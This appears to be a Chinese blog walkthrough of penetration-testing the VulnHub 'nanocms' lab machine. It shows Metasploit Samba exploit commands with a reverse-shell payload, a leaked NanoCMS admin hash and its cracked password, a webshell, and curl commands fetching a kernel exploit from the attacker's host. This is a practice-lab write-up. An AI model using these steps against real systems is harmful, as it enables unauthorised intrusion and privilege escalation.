渗透测试系列 — VulnHub–nanocms

正文:

这个靶机我拿到想的试samba,因为它开了139,445端口,而samba的历史漏洞也是非常多的

一.然后去metasploit 了

1、 使用nmap进行端口扫描
2、 使用search命令查找相关模块
3、 使用use调度模块
4、 使用info查看模块信息
5、 选择payload作为攻击
6、 设置攻击参数
7、 渗透攻击
1.
search samba
2.
use exploit/multi/samba/usermap_script
3.
info 发现是3.0.25,靶机是3.0.26。。。。
4.
show payloads
5.
set payload cmd/unix/reverse
6.
show options(标红处如果是yes,表示这行参数必须填写,如果是no,就是选填,其中有LHOST和RHOST是空,我们根据后面的描述,填上靶机和本地主机的信息。 )
7.
run
试了下,不行

二.

看了下文件附带的pdf文件,纯英文。。。
1.
powered by NanoCMS
百度搜下漏洞利用
google一下nanocms vnlnerability
2.
~andy/data/pagesdata.txt
拿到账号密码,MD5解密,
admin
9d2f75377ac0ab991d40c91fd27e52fd
shannon
3.
写文件
一是一句话,菜刀连,发现无法拖文件
二是,php反弹shell
4.
登陆用户后
curl -o /home/andy/exp http://192.168.244.129/exp
Warning: Failed to create the file /home/andy/exp
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 8832 100 8832 0 0 2077k 0 –:–:– –:–:– –:–:– 2077k
curl: (23) Failed writing body
无写的权限
5.
find / -name “exp” 2 >/dev/null,2>/dev/null  (过滤没有权限的exp)
/dev/null 不行
6.
cd /tmp,有写的权限
curl -o /tmp/exp http://192.168.244.129/exp,成功写入
在kali上搜了下内核版本的exp,对是对的上号,但是32和64的版本问题(exp好像是32的汇编语言编写的,版本较老)
cannot execute binary file
 
2018.7.16

发表评论

电子邮件地址不会被公开。 必填项已用*标注